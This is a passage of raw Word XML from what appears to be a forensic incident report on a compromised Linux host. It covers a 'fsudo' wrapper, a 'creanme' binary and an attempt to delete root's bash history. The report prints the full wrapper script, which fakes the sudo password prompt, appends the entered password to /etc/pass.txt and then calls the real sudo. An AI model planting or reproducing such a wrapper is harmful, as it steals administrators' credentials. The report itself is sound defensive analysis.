      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>johnsysadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, the first time the password is entered a warning message appears. This is because the first time the password is not passed to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but it is written to a file on the system. That file being </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/pass.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This can be seen from the following content of the modified </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fsudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F85CED" w14:textId="2ACF3FA3" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fsudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3011AFB7" w14:textId="77777777" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>read -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">] password for $USER: " </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudopass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="318EBB20" w14:textId="77777777" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAD9B95" w14:textId="77777777" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#991b5887ab76f9fa6061ee44d2d20a8e42de631308853f38f5883e36c8b1d3bc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E367E9D" w14:textId="77777777" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sleep 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA444EB" w14:textId="77777777" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo "Sorry, try again."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F4DD31" w14:textId="77777777" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudopass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/pass.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D650FB" w14:textId="77777777" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63ED7F27" w14:textId="77777777" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> $@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACF0135" w14:textId="29543264" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00103A9F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1DF980" w14:textId="5C4B2F0D" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00103A9F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This binary was found in the following location: </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>johnsysadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/.locale</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fsudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and should be removed immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637D76C3" w14:textId="11D2907B" w:rsidR="0035074C" w:rsidRPr="002355AE" w:rsidRDefault="0035074C" w:rsidP="0035074C">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc119794120"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creanme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” binary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="71EFEC58" w14:textId="42272404" w:rsidR="00103A9F" w:rsidRPr="002355AE" w:rsidRDefault="004375EB" w:rsidP="004375EB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In side</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.locale</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">directory of the user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> an executable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creanme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> was found. After a quick search </w:t>
      </w:r>
      <w:r w:rsidR="00B21094" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">translation from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B21094" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spanish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B21094" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the meaning of that was found to be </w:t>
      </w:r>
      <w:r w:rsidR="00B21094" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>believe me</w:t>
      </w:r>
      <w:r w:rsidR="00B21094" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729D7947" w14:textId="125BCFEC" w:rsidR="00B21094" w:rsidRPr="002355AE" w:rsidRDefault="00B21094" w:rsidP="004375EB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When taking a closer look at the binary the following code can be obtained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67445032" w14:textId="4A8CDE96" w:rsidR="00B21094" w:rsidRPr="002355AE" w:rsidRDefault="00B21094" w:rsidP="00B21094">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10736BD0" wp14:editId="3FB3C14D">
            <wp:extent cx="1546403" cy="1308602"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="2540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l="8013" t="9317" r="24166" b="26506"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1547786" cy="1309773"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="ED7D3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E394DC5" w14:textId="55332007" w:rsidR="00B21094" w:rsidRPr="002355AE" w:rsidRDefault="00B21094" w:rsidP="00B21094">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F724D7">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: Decompiled view of the main function of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D75BA5" w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creanme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="194402A7" w14:textId="77777777" w:rsidR="00B21094" w:rsidRPr="002355AE" w:rsidRDefault="00B21094" w:rsidP="00B21094">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5073EC3D" w14:textId="23C78484" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc119794121"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Erase of evidence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383384DC" w14:textId="3132BFC9" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The attacker tried removing some evidence, by deleting the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bash_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file of the root user, which </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>did not succeed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4464D" w14:textId="55DCD215" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="004375EB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="758D3B88" wp14:editId="1C207223">
            <wp:extent cx="2655570" cy="841299"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="1651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rotWithShape="1">
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="4958" b="1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2655570" cy="841299"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1374595B" w14:textId="01BE5E8B" w:rsidR="00D50403" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
